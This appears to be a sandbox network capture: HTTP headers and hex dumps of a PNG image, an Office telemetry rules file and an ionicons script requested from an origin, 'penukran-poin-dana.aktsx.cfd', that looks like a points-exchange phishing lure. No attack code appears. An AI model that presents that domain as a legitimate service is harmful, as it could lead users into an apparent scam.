                                                                                                                            Content-Length: 5078
                                                                                                                            Content-Type: image/png
                                                                                                                            Etag: "670203dc-13d6"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-b-b586bd68-5qxx9
                                                                                                                            X-Styx-Req-Id: 220b7c8b-83d9-11ef-8da1-a2001dca3824
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            X-Served-By: cache-chi-klot8100120-CHI, cache-ewr-kewr1740045-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215407.388673,VS0,VE40
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 04 00 00 00 07 51 66 15 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 06 82 fe 92 c0 00 00 12 aa 49 44 41 54 78 da ed 9d f9 7b 14 d7 95 86 df 5a 7a 51 ab b5 81 5a 3b 20 c9 80 43 8c 6d c6 78 89 6d 12 1b 18 2f f3 78 e6 c9 3f 3b 36 4e 66 1c c7 4e e2 cc 04 c6 76 12 b0 8d 6d 04 02 24 a1 0d 21 a9 5b ea 56 57 57 cd 0f 75 fb f6 ad d6 d6 6b 55 83 ee a7 07 d1 dd 52 dd 7b ce f9 74 ce b9 e7 2e 55 06 4f 01 bc bd 3e 34 b0 30 b1 88 11 27 8e 01 38 94 28 52 c0 a1 b4 df 25 9d 8f 0e 96
                                                                                                                            Data Ascii: PNGIHDRQfgAMAa cHRMz&u0`:pQ<bKGDtIMEIDATx{ZzQZ; Cmxm/x?;6NfNvm$![VWWukUR{t.UO>40'8(R%
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 37 79 bd 10 f1 18 97 99 56 66 a9 0a fc 89 bf b4 3a dd 75 06 a4 9f 8c 90 c1 50 b2 c9 26 ab 7e 7d d5 9c c6 4d 6d 72 10 c2 8d 72 99 51 f9 a1 c9 32 bf e7 96 ff e6 59 a3 43 ae 4c 96 98 67 9b 51 69 3f 8f 14 f0 d8 df 2a d1 8c d6 4d 5c 2b e8 38 c1 3b 1c 57 26 47 e6 b8 c6 5c 93 4d 77 3c 84 ee dd 8c 92 54 e6 85 0b ac 35 9b 33 1b be 52 88 34 c5 25 31 ae f2 09 b9 c3 ef fc d5 be 67 99 0e 45 ff 04 23 a4 02 63 ae f5 e6 42 75 83 d7 09 71 9e e3 4d 7a 64 d5 61 72 93 3f fa 13 d4 cf 3a 1d 8a 0d 6c 86 48 cb 65 2d 97 22 9b cd 50 d2 d0 55 d2 3b de a4 5b 4e 8f c0 d7 7c f5 ec 0c 72 eb b0 83 c9 20 3d ca 46 09 87 6c e3 76 68 20 a9 0b 31 c6 79 95 a4 dc ec b7 c3 f5 a7 bd 1e af 1f 22 c1 bb 2c e3 d0 23 3f 36 e9 c2 c5 69 2c bd d7 4d 88 a0 23 c3 ab a4 44 8f 06 db 7c c5 2d bc a3 44 86 0f
                                                                                                                            Data Ascii: 7yVf:uP&~}MmrrQ2YCLgQi?*M\+8;W&G\Mw<T53R4%1gE#cBuqMzdar?:lHe-"PU;[N|r =Flvh 1y",#?6i,M#D|-D
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 5b 9d d6 23 c4 5e e7 d3 2d 6c 9d d6 a3 82 09 22 ad 17 65 16 31 95 bb 2f 6a 84 0c f5 fc 6d 25 68 25 75 16 89 0a 15 42 3c e5 c6 7e 09 1d b4 a2 82 9a be 77 24 07 b6 f2 94 1d 8d 50 21 08 11 59 a4 12 b4 ba f5 fe 93 68 a0 7a 88 1b 08 5a f1 fa 1b d3 68 1e c1 8a a3 20 9d c2 a2 3b 6a d1 8e 26 24 21 55 41 cb a0 5b af 1d 46 81 a0 87 54 82 96 47 52 57 23 51 a0 7a 92 24 2f cb 43 4b 3e 0f 57 23 44 28 84 ec 1a 69 a5 75 35 12 3e aa 3d c4 53 1e 95 97 d4 89 3d 7c ec 9e d7 cd 8b f5 75 0f 83 01 9d d8 c3 46 80 10 b1 76 58 79 98 4b 5a fb 48 d8 d8 ed 21 1e 39 a5 1a 39 ae 2b f6 70 b1 d7 52 54 9e bc 98 ed f5 e8 25 1d b5 88 47 0b 55 84 18 e0 3f c3 d0 15 94 d8 0c 6a 1f 09 13 7b 2f d6 56 1e 4b ec d1 af 7d 24 4c ec 22 c4 00 70 d9 50 a6 e2 87 b4 8f 84 87 fd b6 33 e4 94 07 83 0d e8 9a
                                                                                                                            Data Ascii: [#^-l"e1/jm%h%uB<~w$P!YhzZh ;j&$!UA[FTGRW#Qz$/CK>W#D(iu5>=S=|uFvXyKZH!99+pRT%GU?j{/VK}$L"pP3
                                                                                                                            2024-10-06 11:50:07 UTC944INData Raw: 95 24 6f 11 c3 66 85 2f f8 1d 3f 56 ee 61 17 15 2d 4a 90 b2 c8 70 86 53 81 30 55 c2 c3 61 8d 19 16 db 5f 51 b5 d9 06 52 d5 5e de e6 3d a6 b0 03 e1 cb 66 9d 6f f8 92 1b 2c aa 7f a0 e1 41 a1 c2 a0 87 09 26 19 25 8e a3 f8 85 3f 6d 78 8f b9 f2 7d c4 da 2b 5f 08 da 4b a5 07 79 97 7f e5 24 36 26 a6 ac 52 e2 94 98 e7 3a 7f e0 16 ab e1 09 16 58 af e9 66 94 e7 18 27 0d 38 d2 2f fc 4a fc 09 77 b9 df 8e 01 ee de 08 e9 cf 51 aa 3f c2 15 ae 30 19 f0 14 3f 80 15 98 e5 cf 7c ce 2d 7f 9a ae 5d 02 56 2d 9c 25 19 e3 34 a7 e8 c3 0c a4 ef 92 20 e3 67 66 fd 79 aa b0 4c 15 62 7c 90 a6 18 e6 32 1f 30 4d 02 43 7a 8a 5f a9 d8 e4 f8 81 3f f1 15 3f f2 58 79 b6 62 d3 82 ee 5a bf 34 e9 66 88 49 a6 19 24 46 49 fa 45 25 4c ad 72 87 7b ed 1b de ee 87 90 f3 a8 34 cc 10 bf e1 3d ce 91 c6
                                                                                                                            Data Ascii: $of/?Va-JpS0Ua_QR^=fo,A&%?mx}+_Ky$6&R:Xf'8/JwQ?0?|-]V-%4 gfyLb|20MCz_??XybZ4fI$FIE%Lr{4=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            21192.168.2.64974413.107.246.60443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:08 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-10-06 11:50:08 UTC540INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:08 GMT
                                                                                                                            Content-Type: text/plain
                                                                                                                            Content-Length: 218853
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public
                                                                                                                            Last-Modified: Fri, 04 Oct 2024 23:21:50 GMT
                                                                                                                            ETag: "0x8DCE4CB535A72FA"
                                                                                                                            x-ms-request-id: 4dad204e-401e-005b-4bf5-169c0c000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241006T115008Z-1657d5bbd48wd55zet5pcra0cg00000001tg00000000f93b
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-10-06 11:50:08 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                            2024-10-06 11:50:08 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                                                                            Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                                                                            2024-10-06 11:50:08 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                                                                            Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                                                                            2024-10-06 11:50:09 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                            Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                                                                            2024-10-06 11:50:09 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                                                                            Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                                                                                            2024-10-06 11:50:09 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                                                            Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                                                                            2024-10-06 11:50:09 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                                                                            Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                                                                            2024-10-06 11:50:09 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                                                                            Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                                                                                                                            2024-10-06 11:50:09 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                                                                            2024-10-06 11:50:09 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                            Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            22192.168.2.649751104.17.249.2034436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:08 UTC634OUTGET /ionicons@7.1.0/dist/ionicons/p-1c0b2c47.entry.js HTTP/1.1
                                                                                                                            Host: unpkg.com
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            Origin: http://penukran-poin-dana.aktsx.cfd
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                            Referer: https://unpkg.com/ionicons@7.1.0/dist/ionicons/p-d15ec307.js
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:08 UTC576INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:08 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            access-control-allow-origin: *
                                                                                                                            cache-control: public, max-age=31536000
                                                                                                                            last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                            etag: W/"102d-HAssR+EnInAFwASMc9EDSQssXSU"
                                                                                                                            via: 1.1 fly.io
                                                                                                                            fly-request-id: 01J5XX877WG9RAWVKKBRW81SFA-lga
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 3856024
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ce56ea158b842e8-EWR
                                                                                                                            2024-10-06 11:50:08 UTC793INData Raw: 31 30 32 64 0d 0a 69 6d 70 6f 72 74 7b 72 20 61 73 20 6f 2c 68 20 61 73 20 69 2c 48 20 61 73 20 74 2c 61 20 61 73 20 6e 7d 66 72 6f 6d 22 2e 2f 70 2d 64 31 35 65 63 33 30 37 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 69 20 61 73 20 73 2c 62 20 61 73 20 72 2c 67 20 61 73 20 65 2c 63 2c 64 20 61 73 20 61 7d 66 72 6f 6d 22 2e 2f 70 2d 34 30 61 65 32 61 61 37 2e 6a 73 22 3b 63 6f 6e 73 74 20 6c 3d 6f 3d 3e 7b 69 66 28 31 3d 3d 3d 6f 2e 6e 6f 64 65 54 79 70 65 29 7b 69 66 28 22 73 63 72 69 70 74 22 3d 3d 3d 6f 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 6c 65 74 20 69 3d 30 3b 69 3c 6f 2e 61 74 74 72 69 62 75 74 65 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 63 6f 6e 73 74 20 74 3d 6f 2e 61 74 74 72 69
                                                                                                                            Data Ascii: 102dimport{r as o,h as i,H as t,a as n}from"./p-d15ec307.js";import{i as s,b as r,g as e,c,d as a}from"./p-40ae2aa7.js";const l=o=>{if(1===o.nodeType){if("script"===o.nodeName.toLowerCase())return!1;for(let i=0;i<o.attributes.length;i++){const t=o.attri
                                                                                                                            2024-10-06 11:50:08 UTC1369INData Raw: 6e 65 63 74 28 29 2c 74 68 69 73 2e 69 6f 3d 76 6f 69 64 20 30 29 7d 77 61 69 74 55 6e 74 69 6c 56 69 73 69 62 6c 65 28 6f 2c 69 2c 74 29 7b 69 66 28 74 68 69 73 2e 6c 61 7a 79 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 29 7b 63 6f 6e 73 74 20 6e 3d 74 68 69 73 2e 69 6f 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 28 6f 3d 3e 7b 6f 5b 30 5d 2e 69 73 49 6e 74 65 72 73 65 63 74 69 6e 67 26 26 28 6e 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 2c 74 68 69 73 2e 69 6f 3d 76 6f 69 64 20 30 2c 74 28 29 29 7d 29 2c 7b 72 6f 6f 74 4d 61 72 67 69 6e 3a 69 7d 29 3b 6e 2e 6f 62 73 65 72 76 65
                                                                                                                            Data Ascii: nect(),this.io=void 0)}waitUntilVisible(o,i,t){if(this.lazy&&"undefined"!=typeof window&&window.IntersectionObserver){const n=this.io=new window.IntersectionObserver((o=>{o[0].isIntersecting&&(n.disconnect(),this.io=void 0,t())}),{rootMargin:i});n.observe
